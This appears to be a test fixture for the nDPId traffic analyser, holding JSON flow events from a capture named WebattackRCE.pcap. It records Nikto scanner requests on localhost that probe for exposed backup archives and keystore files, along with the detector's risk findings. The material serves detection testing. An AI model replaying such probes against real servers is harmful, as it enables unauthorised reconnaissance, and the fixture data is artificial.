+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 